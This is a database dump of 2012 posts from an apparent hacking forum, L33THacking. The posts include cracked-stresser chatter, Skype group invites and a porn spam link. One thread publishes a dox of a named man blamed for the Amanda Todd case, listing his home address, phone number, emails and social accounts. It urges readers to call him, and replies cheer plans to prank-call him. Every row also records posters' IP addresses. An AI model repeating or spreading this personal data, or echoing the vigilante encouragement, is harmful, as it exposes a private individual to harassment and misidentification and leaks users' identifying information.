`edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4956', '832', '4370', '25', 'RE: [News] Windows 8 security flaw', '0', '5', 'Timmy', '1350433031', 'Why is the biggest computing company so vulnerable to hacks and cracks?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '550932fb49ea64f7205b00468b6bbc21', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4957', '895', '4887', '4', 'RE: D?ea saying hello<3', '0', '3', '??????????¢™', '1350433191', 'Hello Drea, Welcome to LH. We hope you enjoy your stay in our warm, cozy home.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '6eb1543d42f8bacec8a3018d7bd097f0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4958', '894', '4886', '21', 'RE: [FREE] Anonymous Stresser [Cracked]', '0', '5', 'Timmy', '1350433231', 'What\'s the difference between a stresser and a booter?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '3c147c821545131a2bd6f080a10816d6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4959', '603', '4938', '47', 'RE: Custom Pastebin Source Code', '0', '3', '??????????¢™', '1350433289', '[quote=\'Rave™\' pid=\'4938\' dateline=\'1350427592\'] Wow you are LQ. Even after joker told you NO POST AND PM You did post and PM. Very LQ and I hope you lose your mod. [/quote] Actually joker gave me the choice of posting the link in the post or telling them that I will PM them. So how is it LQ? Dont talk shit if you dont know what you are talking about.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '72a7046b3766c936463a6d48128c8016', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4960', '775', '3997', '75', 'RE: GTA San Andreas Cheats', '0', '9', 'p420', '1350433388', 'Nice list, surviving without cheats in GTA SA is impossible.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'ac825104cdf98f424f93996669b86fe1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4961', '603', '3320', '47', 'RE: Custom Pastebin Source Code', '0', '1', 't3h jok3r', '1350433502', '[quote=\'Rave™\' pid=\'3320\' dateline=\'1349347214\'] Could I have this? Thanks. AND STOP WITH THE FUCKING POST AND PM [/quote] Post here and PM me is not allowed [b]but[/b] post here and [b][u]I[/b][/u] PM you is allowed. I can\'t really force all content to be public because we have a lot of leechers from anarchy and we need more posts at the moment.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '63f16763d6e5b6bb9dc0ae73e07dce9f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4962', '894', '4958', '21', 'RE: [FREE] Anonymous Stresser [Cracked]', '0', '100', '??zg???g????61', '1350433519', '[quote=\'Timmy\' pid=\'4958\' dateline=\'1350433231\'] What\'s the difference between a stresser and a booter? [/quote] The names ;D', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'e6b6d56bb95d39329238a925b9c84d06', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4963', '874', '4954', '7', 'RE: N.A.S.A HACKED', '0', '3', '??????????¢™', '1350433537', '[quote=\'MeowMeow\' pid=\'4954\' dateline=\'1350432908\'] You guys are thinking that NASA is some OMG site. Not really it\'s really not that good in any security at all. No new thing. [/quote] LMAO no we arent, Its because it is a government site we arent thinking its a OMG site.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '34049c1f6dd0d54a1a2762f9787f8350', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4964', '603', '4961', '47', 'RE: Custom Pastebin Source Code', '0', '3', '??????????¢™', '1350433731', '[quote=\'t3h jok3r\' pid=\'4961\' dateline=\'1350433502\'] [quote=\'Rave™\' pid=\'3320\' dateline=\'1349347214\'] Could I have this? Thanks. AND STOP WITH THE FUCKING POST AND PM [/quote] Post here and PM me is not allowed [b]but[/b] post here and [b][u]I[/b][/u] PM you is allowed. I can\'t really force all content to be public because we have a lot of leechers from [A. Forums] and we need more posts at the moment. [/quote] See Rave I told you that he told me this is allowed.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '773f30f7a47bd2cd24f8779ec44aeea0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4965', '904', '0', '7', 'New Official L33THacking Skype Group Chat', '0', '3', '??????????¢™', '1350434160', '[b]Hello guys, i have started a new skype group chat since the others kinda failed. I will moderate it like I moderate L33THacking.[/b] [b][align=center][size=large]NO CHILDISH THINGS NO PORN UNLESS YOU WARN OTHERS NO VIRUS LINKS[/size][/align][/b] [b]If you would like to join this skype group just post your skyoe below and I will send you a request and add you.[/b]', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'cf90d3641a874fc9786a366d4f6bccac', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4966', '905', '0', '42', 'Anonymous identified cyber stalker who drove Amanda Todd to suicide', '0', '8', 'spacefish36', '1350435281', '[img]http://3.bp.blogspot.com/-EOR28hNrKs0/UH3HeMFgx_I/AAAAAAAAJ_o/u_SqgT7j-BI/s640/Amanda+Todd.jpg[/img] Hacker group Anonymous may have tracked down the sex-obsessed cyberbully who drove a 15-year-old girl to kill herself last week. Today Anonymous posted a video on YouTube naming a 30-year-old man from British Columbia, as the person responsible for the October 10th suicide of 15-year-old Amanda Todd. Anonymous has started #OpRIP to hunt down those who bullied Todd. [b]\"This is the pedophile that social engineered Amanda Todd into supplying him nude pictures,[/b]\" Anonymous said in a Pastebin post before identifying a 30-year-old man living in New Westminster, B.C. Todd committed suicide after years of online abuse by a man who blackmailed her, posted her topless photo online and sent it to her peers. In Todd\'s video, on handwritten note cards, she detailed the story of a man she said threatened to send photos of her breasts to friends and relatives unless she put on a sexual show for him. She apparently refused and he later made good on that promise, police told her. [b]Identity:[/b] Kody Maxson Online [b]Username:[/b] kody1206 [b]Location:[/b] Sapper St, New westminster,BC [b]Birthdate[/b] 1980, age 30 - See more at: http://thehackernews.com/2012/10/anonymous-identified-cyber-stalker-who.html#sthash.f1RIT98o.dpuf', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'e7fc353e384ae6357252a2ddad50fde0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4967', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '82', 'iTzIpod', '1350435352', 'Never really noticed you before. Sorry..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a3eebe1896ad8a7302e5dfd629ed498f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4968', '893', '4885', '77', 'RE: GamerTag Availability Checker Site', '0', '82', 'iTzIpod', '1350435387', 'Agreed with Virtual Keep it up! :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'cd67d5188b9acecd7da9445e3668caa5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4969', '900', '4929', '63', 'RE: Who wants a New Signature !!! | I will make one for you!', '0', '82', 'iTzIpod', '1350435441', 'Any sample templates of the requests? Type: Size: Render: Colors: Text: Etc?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '89c37e13683fdba296b45433962833a6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4970', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1350435488', 'http://l33thacking.net/index.php', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f14e363aaf9ac2935fd09fe019d6f8c1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4971', '904', '4965', '7', 'RE: New Official L33THacking Skype Group Chat', '0', '82', 'iTzIpod', '1350435559', 'Ooo. Add me in Skype ID: iTzIpod', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1d6ee29c773a1e9f7705f2328f8d28f5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4972', '901', '4930', '19', 'RE: L33THacking Skype Resolver!', '0', '61', 'NXK', '1350435618', 'Way to steal my idea.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'a5eba7aa10a1ccd30c4ac07ac553ea81', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4973', '190', '665', '56', 'RE: Copy and paste game', '0', '61', 'NXK', '1350435679', 'http://nxkallday.comoj.com/', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'c6fcb6886354f7fdbf0e8c022cd77827', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4974', '905', '4966', '42', 'RE: Anonymous identified cyber stalker who drove Amanda Todd to suicide', '0', '82', 'iTzIpod', '1350435681', 'Oh. So this guy is a pedophile? Alright. Hope he gets arrested.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6989deb3278f6dcc38cef8bcc99ed8c8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4975', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1350435893', 'http://nxkallday.comoj.com/ Lool NXK', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0a658db3ee97deda41d8f8c9368013df', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4978', '904', '4971', '7', 'RE: New Official L33THacking Skype Group Chat', '0', '3', '??????????¢™', '1350438216', '[quote=\'iTzIpod\' pid=\'4971\' dateline=\'1350435559\'] Ooo. Add me in Skype ID: iTzIpod [/quote] You have been added.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'dc8d423adb679bb0eb003b8c2830dcc9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4979', '895', '4887', '4', 'RE: D?ea saying hello<3', '0', '253', 'GlowingCapes', '1350438470', 'Welcome to LH. Enjoy your stay (I know you will :P).', '173.76.159.245', '-1387487243', '0', '0', '0', '0', '1', '0fd3934fe32e1e0e34c6ca5ac7d84bcd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4980', '627', '3328', '33', 'RE: What can I do to improve this?', '0', '253', 'GlowingCapes', '1350438577', 'You need lost more action in it, fill the empty space, and maybe some more lighting effects and things. Other than that, it\'s good. [quote=\'Apathy\' pid=\'3328\' dateline=\'1349352036\'] I would restart honestly. Needs to have the render blend more and this is WAYYYY to much empty space. Keep trying. :P [/quote] This also.', '173.76.159.245', '-1387487243', '0', '0', '0', '0', '1', '3b3da14d4ec1c1c8d7d1ece139188c55', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4981', '893', '4885', '77', 'RE: GamerTag Availability Checker Site', '0', '253', 'GlowingCapes', '1350438661', 'Thanks! Just found out if my next gamertag name-change is available.. it is. ;)', '173.76.159.245', '-1387487243', '0', '0', '253', '1350438673', '1', '0b0fef26c6c9ca813779f33c0c4737b6', '0', '1350438673'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4982', '906', '0', '42', 'DOX of Kody Maxson', '0', '1', 't3h jok3r', '1350439287', 'RIP Amanda http://l33thacking.net/forum-42.html Anonymous\' Identiy Configuration Amanda Todd\'s Punisher Extorted amanda todd for pictures. This is the pedophile that social engineered Amanda Todd into supplying him nude pictures. COURT PAPER: https://sphotos-b.xx.fbcdn.net/hphotos-snc6/229991_502445646447057_829142775_n.jpg Identity: Kody Maxson Online Username: kody1206 Age: 32 (born on 07/09/1980) Address: 105-117 Sapper St Town: New Westminster, BC V3L 3Y6, Canada Phone Number: +1 404-426-5684 (Call using Skype and ask him why he did this) Email: kody@hotmail.ca kody.maxson@hotmail.com Google Plus: https://plus.google.com/100714506300989733154/posts Twitter: https://twitter.com/kody1206 Get Glue: http://getglue.com/kody1206 WikiPedia: http://en.wikipedia.org/wiki/User:Kody1206 Devian art: http://kody1206.deviantart.com/ Tumbler: http://kody1206.tumblr.com/ Last FM: http://www.last.fm/user/kody1206 Justin TV: http://www.justin.tv/kody1206 Youtube: http://www.youtube.com/kody1206', '72.231.24.165', '1223104677', '1', '0', '1', '1350439386', '1', '3d987d6064d0a0f736eb1a0b03330846', '0', '1350439386'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4983', '904', '4965', '7', 'RE: New Official L33THacking Skype Group Chat', '0', '1', 't3h jok3r', '1350439436', 'I don\'t allow official chat groups, you do know that right? :O', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '5a9180ce843a307923be77f700e8f693', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4984', '904', '4965', '7', 'RE: New Official L33THacking Skype Group Chat', '0', '222', 'Exposé', '1350441728', 'Lol its just a group of us chattin..it\'s nothin official. And you are apart of it :P', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'bbafc4db37af24617ea94ca5acff6c91', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4985', '902', '4937', '52', 'RE: Who wants a Tutorial on how to make a Generator in VB', '0', '2', 'Apathy', '1350441758', 'I would love this. Please do make it.', '173.206.129.235', '-1378975253', '0', '0', '0', '0', '1', '056f8cc5185a26b371f85b6923824237', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4986', '906', '4982', '42', 'RE: DOX of Kody Maxson', '0', '222', 'Exposé', '1350441788', 'Thanks for sharing dude... this guy is gonna get so much shit', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'c24dc41d57aba698522cd7682ad5a9d7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4987', '895', '4887', '4', 'RE: D?ea saying hello<3', '0', '2', 'Apathy', '1350441904', 'Welcome to the forums. Enjoy your stay. Try to be active and helpful. :)', '173.206.129.235', '-1378975253', '0', '0', '2', '1350441925', '1', '1357af3e91cf25cf9513a0e7d27ae3bb', '0', '1350441925'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4988', '50', '132', '12', 'RE: [tut]How to DOX', '0', '222', 'Exposé', '1350441982', 'Lol thanks for the quick guide. Appreciate it :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '9cbc0fc4bd8fc2127e9954bb82c253fc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4989', '887', '4823', '3', 'RE: How did virtual become Mod? Explanation here', '0', '222', 'Exposé', '1350442280', 'Moderators and Admins should close this when the question is answered :P', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'ff7ff6c5f81d9fc3fe3b1ef1d7a72e4b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4990', '825', '4320', '8', 'RE: Favorite Rappers?', '0', '222', 'Exposé', '1350442310', 'I like kid cudi and kayne west tbh :P', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '28fb38f57c176ede559f7f54d6cbd866', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4991', '904', '4965', '7', 'RE: New Official L33THacking Skype Group Chat', '0', '228', 'VirtualLegend', '1350442356', 'Looks Awesome to chat with the other LH Members', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '0d2a765a6c856419b71fa0bbb9b156f9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4992', '889', '4842', '3', 'RE: Vote for a new theme', '0', '2', 'Apathy', '1350442381', 'is not opening. Out of 2 and three though I like 3 better.', '173.206.129.235', '-1378975253', '0', '0', '0', '0', '1', '341e7d3423b8aa159ad7781c31783f93', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4993', '906', '4982', '42', 'RE: DOX of Kody Maxson', '0', '228', 'VirtualLegend', '1350442452', 'Lol I\'m gonna Prank Call him', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '98de42bd1e0dab883aa3eaa413482c9e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4995', '904', '4965', '7', 'RE: New Official L33THacking Skype Group Chat', '0', '222', 'Exposé', '1350442757', 'You should definately join the voice chat tho ....', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '21bd5c9ffb275b792c0172a5862f50f9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4996', '902', '4985', '52', 'RE: Who wants a Tutorial on how to make a Generator in VB', '0', '228', 'VirtualLegend', '1350442765', '[quote=\'Apathy\' pid=\'4985\' dateline=\'1350441758\'] I would love this. Please do make it. [/quote] Okay I will prepare a good tutorial', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '5f537a76c4713394bafec06a45619ad0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4997', '904', '4983', '7', 'RE: New Official L33THacking Skype Group Chat', '0', '3', '??????????¢™', '1350443442', '[quote=\'t3h jok3r\' pid=\'4983\' dateline=\'1350439436\'] I don\'t allow official chat groups, you do know that right? :O [/quote] Official as in the best.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '3f1d5caf6213bdbade302cbfdb321e1f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4998', '907', '0', '7', 'Ohio Bus Driver Uppercuts Lady | Mortal Kombat Edit', '0', '3', '??????????¢™', '1350444382', '[b]Hello guys, Check out my edit for the Ohio Bus Driver uppercutting a lady video. It may not be all that good because I am not an editor. Drop a like and a comment if you like it please. THANKS :)[/b] http://www.youtube.com/watch?v=xtvy_dxfl14', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '54c178ce5298ff6bdc956f9ce18c48f5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4999', '908', '0', '54', '[17OCT]bangbros,mofos,pornpros,realitykings,vivid,naughtyamerica,brazzers and many', '0', '255', 'sbhshroy2', '1350444662', 'click here http://adf.ly/DlIaZ', '27.97.180.162', '459388066', '0', '0', '0', '0', '1', '6f2feef03ba2a4f0c944a96964ed0a53', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5000', '907', '4998', '7', 'RE: Ohio Bus Driver Uppercuts Lady | Mortal Kombat Edit', '0', '222', 'Exposé', '1350446341', 'haha lmao this is hilarious...I could watch this 100 more times', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '8880ee7810671a752899caf672025921', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5001', '898', '4906', '71', 'RE: Can You Run It? | Tutorial (Very Handy For PC Gamers) |', '0', '222', 'Exposé', '1350446391', 'yeh I use this site alot when I want to play games', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '6b0ec9e9059db4b0269af8d596895df4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5002', '898', '4906', '71', 'RE: Can You Run It? | Tutorial (Very Handy For PC Gamers) |', '0', '257', 'XxTREYZxX', '1350446676', 'yeah i already knew this but thanks any way :)', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '42616eac4d7d8831e54e697b623ec4e7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5003', '907', '4998', '7', 'RE: Ohio Bus Driver Uppercuts Lady | Mortal Kombat Edit', '0', '257', 'XxTREYZxX', '1350446886', 'this is so funny made me lol. this is one of the funniest things>', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '51a4ac4a39d506858c18f6499772fdfa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5004', '190', '665', '56', 'RE: Copy and paste game', '0', '257', 'XxTREYZxX', '1350447135', 'what did i have copied and pasted is this ?(???)? , this is for my name ahah lol>', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', 'dddff8c36f3ab397df73be8c395d67aa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5005', '907', '4998', '7', 